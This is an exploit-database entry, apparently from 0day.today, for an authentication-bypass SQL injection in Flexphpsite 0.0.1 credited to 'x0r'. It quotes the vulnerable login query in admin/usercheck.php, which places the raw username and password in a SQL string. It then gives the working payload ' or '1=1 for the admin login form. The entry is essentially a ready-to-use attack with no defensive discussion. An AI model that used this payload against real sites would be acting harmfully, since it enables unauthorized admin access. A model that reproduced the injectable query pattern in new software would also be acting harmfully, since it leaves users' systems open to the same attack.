Flexphpsite 0.0.1 (Auth Bypass) SQL Injection Vulnerability

2008-12-29T00:00:00
ID 1337DAY-ID-4569
Type zdt
Reporter x0r
Modified 2008-12-29T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
Flexphpsite 0.0.1 (Auth Bypass) SQL Injection Vulnerability
===========================================================


#############################################
Autore: x0r
Cms: Flexphpsiteen
Version: 0.0.1
Download: http://www.china-on-site.com/flexphpsite/downloads.html
##############################################

Bug In \admin\usercheck.php

$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";

Exploit:
 
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1

Greetz: Anna <3



#  0day.today [2018-02-09]  #